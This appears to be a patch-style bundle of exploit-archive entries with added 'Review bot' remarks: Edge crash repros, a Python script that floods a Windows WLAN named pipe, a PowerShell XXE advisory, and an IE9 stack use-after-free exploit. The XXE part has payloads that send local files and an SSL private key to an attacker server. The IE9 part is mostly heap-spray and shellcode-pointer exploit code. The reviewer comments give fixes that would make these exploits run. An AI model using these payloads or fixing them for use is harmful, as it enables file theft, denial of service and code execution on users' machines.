Soon after, I found another repro that trigger a slightly different NULL pointer dereference in CBase­Scriptable::Private­Query­Interface in a 64-bit version of Edge. The second repro was:
<body onload=typeof(open().ms­Credentials)>
I never tested the these two repros in a 32-bit version of Edge before publishing them, which I immediately regretted after finding that the second repro triggered an access violation using the obviously non-NULL address 0x1BF37D8 in a 32-bit version of Edge!
Around this time, I started finding many variations of this bug: getting the type of various properties or objects associated with another window was triggering all kinds of access violations. Many of these were not using NULL pointers on 32-bit Edge. I collected all the variations my fuzzers had found and come up with these additional repros:
<body onload=typeof(open().document.create­Element("canvas").get­Context("2d"))>
This triggered an access violation in edgehtml.dll!CBase­Scriptable::Private­Query­Interface while attempting to read from address 0x4C261 in the 32-bit version of Edge.
<body onload=typeof(open().navigator.media­Devices)>
This triggered an access violation in charkra.dll!Thread­Context::Pre­Sweep­Callback while attempting to read from address 0x­FF80A90F in the 32-bit version of Edge.
<body onload=typeof(open().to­String)>
This triggered an assertion failure because it was calling a deprecated API in the 32-bit version of Edge.
I looked again at the original crypto repro and noticed that although it triggered an access violation using a NULL pointer on both 32-bit and 64-bit versions of Edge, the two addresses (3 and 8 respectively) had different alignment. This is rather odd: true NULL pointer dereferences can cause an access violation at a different offset from NULL on these two architectures because property values and pointers stored before the one being read/written can have different sizes on 32-bit and 64-bit systems, but one usually expects them to have similar alignment: the last two bits of the address should be the same.
Report
If only I had tested the original repro in a 32-bit version of Edge when I first analyzed the issue, I might have realized it was more than a simple NULL pointer and not published it before doing additional research.
I contacted ZDI and asked if they would be interested in buying the vulnerability at this point, given that I publicly released the repro that triggered a NULL pointer and filed it with Microsoft. I was hoping they would decide that this did not disclose the underlying vulnerability and that it as such would still be a 0-day. Unfortunately for me, they were not interested in acquiring details in this situation.
At that point I decided to contact the Microsoft Security Response Center and report the additional information I had found. I also contacted a few people working on the Edge team at Microsoft directly to let them know they might want to escalate this bug from a simple NULL pointer to a security vulnerability. Unfortunately, this let them to decided to mark the bug I had filed in the Edge bug tracker as hidden. I warned them that this did little good, as the details were still public in my twitter and even if I deleted that, in general what goes on the internet stays on the internet.
Analysis
Since I had publicly released the repro, I was not going to be seeing any kind of reward for this bug, so analyzing the issue was not a priority for me. Unfortunately that meant I did not analyze it at all, other than to speculate that this bug was likely to have been a type-confusion or bad cast, where assembled code was used as data, leading to most of these repros triggering an access violation at a static address that depended on the code they were using as data. It may therefore be possible to find a variation that uses code that represents an address in the address space of Edge where an attacker might store data under his/her control. This is especially true for 32-bit Edge, as the address space is a lot smaller. Depending on what the code does with the address, it might be possible to execute arbitrary code under perfect circumstances.
On Hiding bugs in public bug trackers
Hiding a publicly reported bug after the fact is a very bad idea IMHO, as it paints an easy to detect target on the bug. Every smart attacker should have a system that makes regular copies of all publicly reported bugs in target applications and reports to their owner all bugs that become hidden, with a copy of all the information it scraped from the bug before it was hidden. Since hiding a public bug only ever happens for one of two reasons: the bug was found to be a security issue, or the report accidentally contains personal information that the owner wants hidden. It should be quite easy to distinguish between the two to filter out the vulnerabilities, giving an attacker a nearly free stream of nearly 0-day bugs. If you work on a team that has a public bug-tracker, you may want to discuss this with your team and decided how to handle such situations.
Conclusion
As useful as Bug­Id is in automating a lot of the analysis I do on every bug I find, and in helping me prioritize the issues that are most likely to be vulnerabilities, it is not perfect and cannot always detect a vulnerability for what it is. Bug­Id is not a perfect replacement for full manual analysis of bugs.
In this case I relied to heavily on its ability to distinguish vulnerabilities from other bugs. Because of the nature of this issue, the repros caused access violations at static addresses, many of which near enough to NULL to be interpreted as NULL pointer dereferences, especially for the first repro I found. Bug­Id can not actually determine the root cause of a crash, but attempts to deduce the root cause based on the details of the crash it causes. In this case, the crash looked too similar to a regular NULL pointer dereference for Bug­Id to detect it as anything else.
However, in my current situation, where I am finding way more bugs than I can analyze manually, Bug­Id does a very good job at helping me prioritize and analyze issues. I have used Bug­Id on hundreds of bugs and, as far as I know, this is the first time I mistook a security vulnerability for a regular bug based on the Bug­Id report. As such, the false-negative rate I have experienced is a fraction of a percent, which IMHO is remarkably low and entirely acceptable. At the same time, the false-positive rate I have seen so far is exactly zero.
In order to prevent this from happening in the future, I now test each repro in both the 32-bit and 64-bit version of Edge, do more manual analysis on bugs that get reported as a NULL pointer with a non-DWORD-aligned address (e.g. 3 in this case), and wait slightly longer for my fuzzers to find variations of a bug before I start my analysis and report the issue as a non-security bug.
Time-line
29 April 2016: This vulnerability was first found through fuzzing.
10 May 2016: This issue was published on Twitter and reported to Microsoft.
13 May 2016: This vulnerability was submitted to ZDI.
18 May 2016: This vulnerability was declined by ZDI.
18 May 2016: This vulnerability was reported to MSRC and I informed Edge developers directly on the seriousness of the bug.
18 May 2016: The issue was hidden in public bug tracker.
14 June 2016: Microsoft addresses this vulnerability in MS16-068.
December 2016: Details of this vulnerability are released.
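Review bot: `charkra.dll!Thread­Context::Pre­Sweep­Callback` under the mediaDevices repro looks like a typo for chakra.dll, and the module name matters to anyone reproducing the crash locations, so it should be corrected. The CamelCase identifiers throughout (`CBase­Scriptable::Private­Query­Interface`, `ms­Credentials`, `media­Devices`, `create­Element`) contain soft-hyphen (U+00AD) characters that break copy-and-paste of the six repros; strip them from the file. In the Report section, "this let them to decided to mark the bug" should read "this led them to decide to mark the bug". Finally, the advisory never states the Edge build the repros were run on, although the 32-bit versus 64-bit comparison of the fault addresses 3 and 8 in the Discovery section depends on it.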

platforms/windows/dos/40883.py Executable file

@ -0,0 +1,59 @@
#!/usr/bin/python
# wlanautoconfig-poc.py
#
# Windows WLAN AutoConfig Named Pipe POC
#
# Jeremy Brown [jbrown3264/gmail]
# Dec 2016
#
# > wifinetworkmanager.dll!__FatalError(char const *,unsigned # long,char const *, ...)
# AsyncPipe::ReadCompletedCallback(void)
# AsyncPipe::Dispatch(int,void *,void *, ...)
# Synchronizer::EnqueueEvent(...)
# AsyncPipe::ReadCompletedStatic(...)
#
# --> STATUS_STACK_BUFFER_OVERRUN @ svchost.exe
#
# Tested:
#
# Windows 10 x86/x64 BUILD 10.0.14393 (vulnerable)
# Windows Server 2012 R2 x64 (not vulnerable, service doesn't create pipe)
#
# Dependencies:
#
# pip install pypiwin32
#
# Notes:
#
# This won't kill Wlansvc service, but the thread servicing the pipe will terminate
#
import win32file
import pywintypes
import msvcrt
BUF_SIZE = 4096
PIPE_NAME = r'\\.\pipe\WiFiNetworkManagerTask'
def main():
try:
handle = win32file.CreateFile(PIPE_NAME, win32file.GENERIC_WRITE, 0, None, win32file.OPEN_EXISTING, 0, None)
except Exception:
print("Error: CreateFile() failed\n")
return
fd = msvcrt.open_osfhandle(handle, 0)
if(fd < 0):
print("Error: open_osfhandle() failed\n")
return
buf = bytearray(b'\x42' * BUF_SIZE)
# exact number here could vary, keeping it simple
while True:
win32file.WriteFile(handle, buf)
if __name__ == "__main__":
main()
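Review bot: `fd = msvcrt.open_osfhandle(handle, 0)` and its error branch are dead code, since `fd` is never used after the `if(fd < 0)` check and all writes go through `handle`; drop the call or use the descriptor. The `while True:` loop around `win32file.WriteFile(handle, buf)` also has no exception handling, so when the pipe-servicing thread terminates (the STATUS_STACK_BUFFER_OVERRUN described in the header) the script ends in an uncaught traceback instead of reporting that the pipe broke; wrap the write in `try`/`except pywintypes.error` and print the result, which would also give the currently unused `import pywintypes` a purpose. A `win32file.CloseHandle(handle)` on the way out would keep the PoC tidy.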

platforms/windows/local/40873.txt Executable file

@ -0,0 +1,212 @@
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-POWERSHELL-XML-EXTERNAL-ENTITY.txt
[+] ISR: ApparitionSec
Vendor:
=================
www.microsoft.com
Product:
===========
PowerShell
PowerShell (including Windows PowerShell and PowerShell Core) is a task
automation and configuration management framework
from Microsoft, consisting of a command-line shell and associated scripting
language built on the .NET Framework.
PowerShell provides full access to COM and WMI, enabling administrators to
perform administrative tasks on both local
and remote Windows systems as well as WS-Management and CIM enabling
management of remote Linux systems and network devices.
Vulnerability Type:
===================
XML External Entity
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
PowerShell can read and process XML files, this is by design. However, its
XML parser is vulnerable to XXE attacks, if a user reads a
malicious XML file using powershells XML API. This can potentially allow
local files to be accessed and exfiltrated to an attackers server.
**MSRC response: "behavior by design for parsing".**
Issue is that this setting is default, this puts 'unknowing' users at risk
for XXE attacks and file disclosure. After running PS to process an
Evil XML file from Windows CL you may see errors like:
"Cannot convert value "System.Object[]" to type "System.Xml.XmlDocument".
Error: "Invalid character in the given encoding"
OR
"Exception calling "Load" with "1" argument(s): "Unexpected DTD
declaration."
However, the Local to Remote file access theft still works as planned...
Tested Windows 7 SP1
PS C:\> $psversiontable
Name Value
---- -----
CLRVersion 2.0.50727.5485
BuildVersion 6.1.7601.17514
PSVersion 2.0
Exploit POC code(s):
===================
Scenarios A/B:
A) Reads XML from Web Server:
-------------------------------
Access 'c:\Windows\msdfmap.ini' used by MS ADO Remote Service.
python -m SimpleHTTPServer 8080 (ATTACKER-SERVER)
'payload.dtd' (ATTACKER-SERVER)
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://
[ATTACKER-SERVER]:8080?%file;'>">
%all;
'PWN.xml' (ATTACKER-SERVER)
<?xml version="1.0"?>
<!DOCTYPE HYP3RLINX [
<!ENTITY % file SYSTEM "c:\Windows\msdfmap.ini">
<!ENTITY % dtd SYSTEM "http://[ATTACKER-SERVER]:8080/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
Run from PS CL to load XML:
$vuln = New-Object System.Xml.XmlDocument
$vuln.Load("http://[ATTACKER-SERVER]/PWN.xml")
Users 'msdfmap.ini' file is accessed by attacker.
B) Read XML from remote share in LAN:
----------------------------------------
Example uses three different computers.
VICTIM-COMPUTER local machine using Powershell to read XML.
REMOTE-SHARE is third computer in LAN where 'PWN.xml' is read from.
ATTACKER-SERVER the place where files stolen from VICTIM-COMPUTER will be
sent.
Assuming user is running XAMPP, try target the servers SSL Private key.
[ATTACKER-SERVER]
python -m SimpleHTTPServer 8080
'payload.dtd' (Host on ATTACKER-SERVER)
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://
[ATTACKER-SERVER]:8080?%file;'>">
%all;
'PWN.xml' (Host on REMOTE-SHARE)
<?xml version="1.0"?>
<!DOCTYPE HYP3RLINX [
<!ENTITY % file SYSTEM "C:\xampp\apache\conf\ssl.key\server.key">
<!ENTITY % dtd SYSTEM "http://[ATTACKER-SERVER]:8080/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
[VICTIM-COMPUTER]
Run these examples from PowerShell Command Line.
'VULN.ps1'
Get-WinEvent -FilterXml ([xml](Get-Content
\\[REMOTE-SHARE]\home\username\PWN.xml))
OR
$poc='\\[REMOTE-SHARE]\home\username\PWN.xml'
$test=(Get-Content $poc) -as [Xml]
Enjoy your private key file!
Disclosure Timeline:
===========================================================
Vendor Notification: November 14, 2016
Vendor: "behavior by design for parsing." November 23, 2016
December 5, 2016 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
================
High
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
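Review bot: in Scenario A the attacker server is started with `python -m SimpleHTTPServer 8080`, but the loader line `$vuln.Load("http://[ATTACKER-SERVER]/PWN.xml")` fetches from the default port 80, so the PoC as written never reaches the server; the URL needs `:8080` like the `%dtd` entity in PWN.xml already has. The `<!ENTITY send SYSTEM 'http://` line of payload.dtd is wrapped onto two lines in both scenarios, which a reader saving the text verbatim will turn into a malformed entity; keep it on one line. The advisory also has no Mitigation section, only the vendor's "behavior by design" response; since the PoC goes through `System.Xml.XmlDocument`, a sentence noting that external entity resolution is turned off by clearing the document's XmlResolver property before `Load` would give readers a concrete defensive action, and the "Unexpected DTD declaration" error quoted under Vulnerability Details shows that DTD rejection is already a parser behaviour worth documenting.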


@ -0,0 +1,322 @@
<!--
Source: http://blog.skylined.nl/20161206001.html
Synopsis
A specially crafted web-page can trigger a memory corruption vulnerability in Microsoft Internet Explorer 9. A pointer set up to point to certain data on the stack can be used after that data has been removed from the stack. This results in a stack-based analog to a heap use-after-free vulnerability. The stack memory where the data was stored can be modified by an attacker before it is used, allowing remote code execution.
Known affected software and attack vectors
Microsoft Internet Explorer 9
An attacker would need to get a target user to open a specially crafted web-page. Disabling Java­Script should prevent an attacker from triggering the vulnerable code path.
Repro.html:
<!doctype html>
<script>
var o­Window = window.open("about:blank");
o­Window.exec­Script('window.o­URIError = new URIError();o­URIError.name = o­URIError;')
try { "" + o­Window.o­URIError; } catch(e) { }
try { "" + o­Window.o­URIError; } catch(e) { }
</script>
Description
A Javascript can construct an URIError object and sets that object's name property to refer to the URIError object, creating a circular reference. When that Javascript than attempts to convert the URIError object to a string, MSIE attempts to convert the URIError object's name to a string, which creates a recursive code loop that eventually causes a stack exhaustion.
MSIE attempts to handle this situation gracefully by generating a Java­Script exception. While generating the exception, information about the call stack is gathered using the Javascript­Stack­Walker class. It appears that the code that does this initializes a pointer variable on the stack the first time it is run, but re-uses it if it gets called a second time. Unfortunately, the information the pointer points to is also stored on the stack, but is removed from the stack after the first exception is handled. Careful manipulation of the stack during both exceptions allow an attacker to control the data the pointer points to during the second exception.
This problem is not limited to the URIError object: any recursive function call can be used to trigger the issue, as shown in the exploit below.
Exploit
As mentioned above, the vulnerable pointer points to valid stack memory during the first exception, but it is "popped" from the stack before the second. In order to exploit this vulnerability, the code executed during the first exception is going to point this pointer to a specific area of the stack, while the code executed during the second is going to allocate certain values in that same area before the pointer is re-used.
Control over the stack contents during a stack exhaustion can be achieved by making the recursive calls with many arguments, all of which are stored on the stack. This is similar to a heap-spray storing values on large sections of the heap in that it is not entirely deterministic, but the odds are very highly in favor of you setting a certain value at a certain address.
The exploit triggers the first exception by making recursive calls using a lot of arguments. In each loop, a lot of stack space is needed to make the next call. At some point there will not be enough stack space left to make another call and an exception is thrown. If N arguments are passed during each call, N*4 bytes of stack are needed to store them. The number of bytes left on the stack at the time of the exception varies from 0 to about 4*N and thus averages to about 4*N/2. The vulnerable pointer gets initialized to point to an address near the stack pointer at the time of the exception, at approximately (bottom of stack) + 4*N/2.
The exploit then triggers another stack exhaustion by making recursive calls using many arguments, but significantly less than before. If M arguments are passed during each call this time, the number of bytes left on the stack at the time of the exception averages to about 4*M/2.
When the second exception happens, the vulnerable pointer points inside the stack that was "sprayed" with function arguments. This means we can control where it points to. The pointer is used as an object pointer to get a function address from a vftable, so by using the right value to spray the stack, we can gain full control over execution flow.
The below schematic shows the layout of the stack during the various stages of this exploit:
| |
|<- bottom of stack top of stack ->|
| |
| Stack layout at the moment the first exception is triggered: |
| |
| [--- CALL X ---][-- CALL X-1 --][-- CALL X-2 --][...........]|
| |
|{---------------} Stack space available is less than 4*N bytes |
| |
| ^^^ |
| Vulnerable pointer gets initialized to point around here |
| |
| |
| |
| Stack layout at the moment the second exception is triggered: |
| |
| [CALL Y][CALL Y-1][CALL Y-2][CALL Y-3][CALL Y-3][........................]|
| |
|{--} Stack space available is less than 4*M bytes |
| |
| ^^^ |
| Vulnerable pointer still points around here, most likely at |
| one of the arguments pushed onto the stack in a call. |
| |
In the Proof-of-Concept code provided below, the first exception is triggered by recursively calling a function with 0x2000 arguments (N = 0x2000). The second exception is triggered by recursively calling a function with 0x200 arguments (M = 0x200). The values passed as arguments during the second stack exhaustion are set to cause the vulnerable pointer to point to a fake vftable on the heap. The heap is sprayed to create this fake vftable. A fake function address is stored at 0x28000201 (p­Target) that points to a dummy shellcode consisting of int3's at 0x28000300 (p­Shellcode). Once the vulnerability is triggered, the vulnerable pointer is used to read the pointer to our shellcode from our fake vftable and called, which will attempt to execute our shellcode.
Sploit.html:
-->
<!doctype html>
<script src="String.js"></script>
<script src="spray­Heap.js"></script>
<script>
function stack­Overflow­High­On­Stack() {
stack­Overflow­High­On­Stack.apply(0, new Array(0x2000));
}
function attack(p­Target) {
var ax­Args = [];
while (ax­Args.length < 0x200) ax­Args.push((p­Target - 0x69C) >>> 1);
exception­Low­On­Stack­With­Spray();
function exception­Low­On­Stack­With­Spray() {
try {
(function(){}).apply(0, ax­Args);
} catch (e) {
throw 0;
}
exception­Low­On­Stack­With­Spray.apply(0, ax­Args);
}
}
var p­Spray­Start­Address = 0x09000000;
var d­Heap­Spray­Template = {};
var p­Target = 0x28000201;
var p­Shellcode = 0x28000300;
d­Heap­Spray­Template[p­Target] = p­Shellcode;
d­Heap­Spray­Template[p­Shellcode] = 0x­CCCCCCCC;
window.s­Heap­Spray­Block = create­Spray­Block(d­Heap­Spray­Template);
window.u­Heap­Spray­Block­Count = get­Spray­Block­Count(d­Heap­Spray­Template, p­Spray­Start­Address);
var o­Window = window.open("about:blank");
function prepare() {
window.as­Heap­Spray = new Array(opener.u­Heap­Spray­Block­Count);
for (var i = 0; i < opener.u­Heap­Spray­Block­Count; i++) {
as­Heap­Spray[i] = (opener.s­Heap­Spray­Block + "A").substr(0, opener.s­Heap­Spray­Block.length);
}
}
o­Window.eval("(" + prepare + ")();");
try {
String(o­Window.eval("({to­String:" + stack­Overflow­High­On­Stack + "})"));
} catch(e) {
o­Window.eval("(" + attack + ")(" + p­Target + ")");
}
</script>
<!--
String.js:
String.from­Word = function (w­Value) {
// Return a BSTR that contains the desired DWORD in its string data.
return String.from­Char­Code(w­Value);
}
String.from­Words = function (aw­Values) {
// Return a BSTR that contains the desired DWORD in its string data.
return String.from­Char­Code.apply(0, aw­Values);
}
String.from­DWord = function (dw­Value) {
// Return a BSTR that contains the desired DWORD in its string data.
return String.from­Char­Code(dw­Value & 0x­FFFF, dw­Value >>> 16);
}
String.from­DWords = function (au­Values) {
var as­DWords = new Array(au­Values.length);
for (var i = 0; i < au­Values.length; i++) {
as­DWords[i] = String.from­DWord(au­Values[i]);
}
return as­DWords.join("");
}
String.prototype.repeat = function (u­Count) {
// Return the requested number of concatenated copies of the string.
var s­Repeated­String = "",
u­Left­Most­Bit = 1 << (Math.ceil(Math.log(u­Count + 1) / Math.log(2)) - 1);
for (var u­Bit = u­Left­Most­Bit; u­Bit > 0; u­Bit = u­Bit >>> 1) {
s­Repeated­String += s­Repeated­String;
if (u­Count & u­Bit) s­Repeated­String += this;
}
return s­Repeated­String;
}
String.create­Buffer = function(u­Size, u­Index­Size) {
// Create a BSTR of the right size to be used as a buffer of the requested size, taking into account the 4 byte
// "length" header and 2 byte "\0" footer. The optional argument u­Index­Size can be 1, 2, 4 or 8, at which point the
// buffer will be filled with indices of said size (this is slower but useful for debugging).
if (!u­Index­Size) return "\u­DEAD".repeat(u­Size / 2 - 3);
var au­Buffer­Char­Codes = new Array((u­Size - 4) / 2 - 1);
var u­MSB = u­Index­Size == 8 ? 8 : 4; // Most significant byte.
for (var u­Char­Index = 0, u­Byte­Index = 4; u­Char­Index < au­Buffer­Char­Codes.length; u­Char­Index++, u­Byte­Index +=2) {
if (u­Index­Size == 1) {
au­Buffer­Char­Codes[u­Char­Index] = u­Byte­Index + ((u­Byte­Index + 1) << 8);
} else {
// Set high bits to prevents both NULLs and valid pointers to userland addresses.
au­Buffer­Char­Codes[u­Char­Index] = 0x­F000 + (u­Byte­Index % u­Index­Size == 0 ? u­Byte­Index & 0x­FFF : 0);
}
}
return String.from­Char­Code.apply([][0], au­Buffer­Char­Codes);
}
String.prototype.clone = function () {
// Create a copy of a BSTR in memory.
s­String = this.substr(0, this.length);
s­String.length;
return s­String;
}
String.prototype.replace­DWord = function (u­Byte­Offset, dw­Value) {
// Return a copy of a string with the given dword value stored at the given offset.
// u­Offset can be a value beyond the end of the string, in which case it will "wrap".
return this.replace­Word(u­Byte­Offset, dw­Value & 0x­FFFF).replace­Word(u­Byte­Offset + 2, dw­Value >> 16);
}
String.prototype.replace­Word = function (u­Byte­Offset, w­Value) {
// Return a copy of a string with the given word value stored at the given offset.
// u­Offset can be a value beyond the end of the string, in which case it will "wrap".
if (u­Byte­Offset & 1) {
return this.replace­Byte(u­Byte­Offset, w­Value & 0x­FF).replace­Byte(u­Byte­Offset + 1, w­Value >> 8);
} else {
var u­Char­Index = (u­Byte­Offset >>> 1) % this.length;
return this.substr(0, u­Char­Index) + String.from­Word(w­Value) + this.substr(u­Char­Index + 1);
}
}
String.prototype.replace­Byte = function (u­Byte­Offset, b­Value) {
// Return a copy of a string with the given byte value stored at the given offset.
// u­Offset can be a value beyond the end of the string, in which case it will "wrap".
var u­Char­Index = (u­Byte­Offset >>> 1) % this.length,
w­Value = this.char­Code­At(u­Char­Index);
if (u­Byte­Offset & 1) {
w­Value = (w­Value & 0x­FF) + ((b­Value & 0x­FF) << 8);
} else {
w­Value = (w­Value & 0x­FF00) + (b­Value & 0x­FF);
}
return this.substr(0, u­Char­Index) + String.from­Word(w­Value) + this.substr(u­Char­Index + 1);
}
String.prototype.replace­Buffer­DWord = function (u­Byte­Offset, u­Value) {
// Return a copy of a BSTR with the given dword value store at the given offset.
if (u­Byte­Offset & 1) throw new Error("u­Byte­Offset (" + u­Byte­Offset.to­String(16) + ") must be Word aligned");
if (u­Byte­Offset < 4) throw new Error("u­Byte­Offset (" + u­Byte­Offset.to­String(16) + ") overlaps BSTR size dword.");
var u­Char­Index = u­Byte­Offset / 2 - 2;
if (u­Char­Index == this.length - 1) throw new Error("u­Byte­Offset (" + u­Byte­Offset.to­String(16) + ") overlaps BSTR terminating NULL.");
return this.substr(0, u­Char­Index) + String.from­DWord(u­Value) + this.substr(u­Char­Index + 2);
}
spray­Heap.js:
console = window.console || {"log": function(){}};
function bad(p­Address) {
// convert a valid 32-bit pointer to an invalid one that is easy to convert
// back. Useful for debugging: use a bad pointer, get an AV whenever it is
// used, then fix pointer and continue with exception handled to have see what
// happens next.
return 0x80000000 + p­Address;
}
function blanket(d­Spray_­dw­Value_­p­Address, p­Address) {
// Can be used to store values that indicate offsets somewhere in the heap
// spray. Useful for debugging: blanket region, get an AV at an address
// that indicates where the pointer came from. Does not overwrite addresses
// at which data is already stored.
for (var u­Offset = 0; u­Offset < 0x40; u­Offset += 4) {
if (!((p­Address + u­Offset) in d­Spray_­dw­Value_­p­Address)) {
d­Spray_­dw­Value_­p­Address[p­Address + u­Offset] = bad(((p­Address & 0x­FFF) << 16) + u­Offset);
}
}
}
var gu­Spray­Block­Size = 0x02000000; // how much fragmentation do you want?
var gu­Spray­Page­Size = 0x00001000; // block alignment.
// Different versions of MSIE have different heap header sizes:
var s­JSVersion;
try{
/*@cc_­on @*/
s­JSVersion = eval("@_jscript_­version");
} catch(e) {
s­JSVersion = "unknown"
};
var gu­Heap­Header­Size = {
"5.8": 0x24,
"9": 0x10, // MSIE9
"unknown": 0x10
}[s­JSVersion]; // includes BSTR length
var gu­Heap­Footer­Size = 0x04;
if (!gu­Heap­Header­Size)
throw new Error("Unknown script version " + s­JSVersion);
function create­Spray­Block(d­Spray_­dw­Value_­p­Address) {
// Create a spray "page" and store spray data at the right offset.
var s­Spray­Page = "\u­DEAD".repeat(gu­Spray­Page­Size >> 1);
for (var p­Address in d­Spray_­dw­Value_­p­Address) {
s­Spray­Page = s­Spray­Page.replace­DWord(p­Address % gu­Spray­Page­Size, d­Spray_­dw­Value_­p­Address[p­Address]);
}
// Create a spray "block" by concatinated copies of the spray "page", taking into account the header and footer
// used by MSIE for larger heap allocations.
var u­Spray­Pages­Per­Block = Math.ceil(gu­Spray­Block­Size / gu­Spray­Page­Size);
var s­Spray­Block = (
s­Spray­Page.substr(gu­Heap­Header­Size >> 1) +
s­Spray­Page.repeat(u­Spray­Pages­Per­Block - 2) +
s­Spray­Page.substr(0, s­Spray­Page.length - (gu­Heap­Footer­Size >> 1))
);
var u­Actual­Spray­Block­Size = gu­Heap­Header­Size + s­Spray­Block.length * 2 + gu­Heap­Footer­Size;
if (u­Actual­Spray­Block­Size != gu­Spray­Block­Size)
throw new Error("Assertion failed: spray block (" + u­Actual­Spray­Block­Size.to­String(16) + ") should be " + gu­Spray­Block­Size.to­String(16) + ".");
console.log("create­Spray­Block():");
console.log(" s­Spray­Page.length: " + s­Spray­Page.length.to­String(16));
console.log(" u­Spray­Pages­Per­Block: " + u­Spray­Pages­Per­Block.to­String(16));
console.log(" s­Spray­Block.length: " + s­Spray­Block.length.to­String(16));
return s­Spray­Block;
}
function get­Heap­Block­Index­For­Address(p­Address) {
return ((p­Address % gu­Spray­Page­Size) - gu­Heap­Header­Size) >> 1;
}
function get­Spray­Block­Count(d­Spray_­dw­Value_­p­Address, p­Start­Address) {
p­Start­Address = p­Start­Address || 0;
var p­Target­Address = 0x0;
for (var p­Address in d­Spray_­dw­Value_­p­Address) {
p­Target­Address = Math.max(p­Target­Address, p­Address);
}
u­Spray­Blocks­Count = Math.ceil((p­Target­Address - p­Start­Address) / gu­Spray­Block­Size);
console.log("get­Spray­Block­Count():");
console.log(" p­Target­Address: " + p­Target­Address.to­String(16));
console.log(" u­Spray­Blocks­Count: " + u­Spray­Blocks­Count.to­String(16));
return u­Spray­Blocks­Count;
}
function spray­Heap(d­Spray_­dw­Value_­p­Address, p­Start­Address) {
var u­Spray­Blocks­Count = get­Spray­Block­Count(d­Spray_­dw­Value_­p­Address, p­Start­Address);
// Spray the heap by making copies of the spray "block".
var as­Spray = new Array(u­Spray­Blocks­Count);
as­Spray[0] = create­Spray­Block(d­Spray_­dw­Value_­p­Address);
for (var u­Index = 1; u­Index < as­Spray.length; u­Index++) {
as­Spray[u­Index] = as­Spray[0].clone();
}
return as­Spray;
}
Time-line
13 October 2012: This vulnerability was found through fuzzing.
29 October 2012: This vulnerability was submitted to EIP.
18 November 2012: This vulnerability was submitted to ZDI.
27 November 2012: EIP declines to acquire this vulnerability because they believe it to be a copy of another vulnerability they already acquired.
7 December 2012: ZDI declines to acquire this vulnerability because they believe it not to be exploitable.
During the initial report detailed above, I did not have a working exploit to prove exploitability. I also expected the bug to be fixed soon, seeing how EIP believed they already reported it to Microsoft. However, about two years later, I decided to look at the issue again and found it had not yet been fixed. Apparently it was not the same issue that EIP reported to Microsoft. So, I decided to try to have another look and developed a Proof-of-Concept exploit.
April 2014: I start working on this case again, and eventually develop a working Proof-of-Concept exploit.
6 November 2014: ZDI was informed of the new analysis and reopens the case.
15 November 2014: This vulnerability was submitted to i­Defense.
16 November 2014: i­Defense responds to my report email in plain text, potentially exposing the full vulnerability details to world+dog.
17 November 2014: ZDI declines to acquire this vulnerability after being informed of the potential information leak.
11 December 2012: This vulnerability was acquired by i­Defense.
The accidentally potential disclosure of vulnerability details by i­Defense was of course a bit of a disappointment. They reported that they have since updated their email system to automatically encrypt emails, which should prevent this from happening again.
9 June 2015: Microsoft addresses this vulnerability in MS15-056.
6 December 2016: Details of this vulnerability are released.
-->
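Review bot: the JavaScript in Sploit.html, String.js and sprayHeap.js will not parse as committed: identifiers such as `o­Window.exec­Script(...)`, `stack­Overflow­High­On­Stack` and `String.from­Char­Code` contain soft-hyphen (U+00AD) characters from the blog's wrapping markup, and the `"\u­DEAD"` escapes and `0x­CCCCCCCC` literal are broken the same way; strip U+00AD from the whole file before use. Two smaller points in the helpers: `String.prototype.clone` assigns `s­String = this.substr(0, this.length);` without `var`, and `get­Spray­Block­Count` assigns `u­Spray­Blocks­Count` without `var`, so both leak globals into whichever window runs the spray. In the Time-line, `11 December 2012: This vulnerability was acquired by i­Defense.` sits between the November 2014 entries and the June 2015 fix, after the report was only submitted to iDefense on 15 November 2014, so the year cannot be 2012 and should be checked. Also "The accidentally potential disclosure" should read "The potential accidental disclosure".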